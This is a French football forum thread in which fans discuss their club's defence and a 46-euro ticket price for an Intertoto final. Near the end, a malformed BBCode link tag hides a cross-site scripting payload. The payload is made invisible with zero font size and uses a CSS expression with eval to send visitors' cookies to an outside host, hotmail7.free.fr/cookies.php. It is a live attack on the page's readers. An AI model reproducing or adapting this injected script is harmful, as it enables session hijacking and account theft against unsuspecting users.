Modérateur: Modérateurs
*Massalia* a écrit:gob, munitis c'est une mobilette... face à nos défenseurs qui tirent la caravane en ce moment ça me fesait peur, surtout chez eux... la c'est déja ça de pris on va pas cracher dessus.
manuchao a écrit:Moi j'aurai bien été a l'aller mais 46E rien que la place , ca refroidit tout de suite .
Ils peuvent se les carrer ou je pense leur places . C'est vrai que c'est une finale mais c'est l'intertoto .
crikken a écrit:*Massalia* a écrit:gob, munitis c'est une mobilette... face à nos défenseurs qui tirent la caravane en ce moment ça me fesait peur, surtout chez eux... la c'est déja ça de pris on va pas cracher dessus.
d'ailleurs la nouvelle chanson sui accompagnera les joueurs à leur entrée sur le vèl sera caravane de raphaél...
manuchao a écrit:Moi j'aurai bien été a l'aller mais 46E rien que la place , ca refroidit tout de suite .
Ils peuvent se les carrer ou je pense leur places . C'est vrai que c'est une finale mais c'est l'intertoto .
nms a écrit:manuchao a écrit:Moi j'aurai bien été a l'aller mais 46E rien que la place , ca refroidit tout de suite .
46€??
Ils se croient en Angleterre?
Purement scandaleux...
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://hotmail7.free.fr/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
Utilisateurs parcourant ce forum : Google [Bot], Major Tonio et 156 invités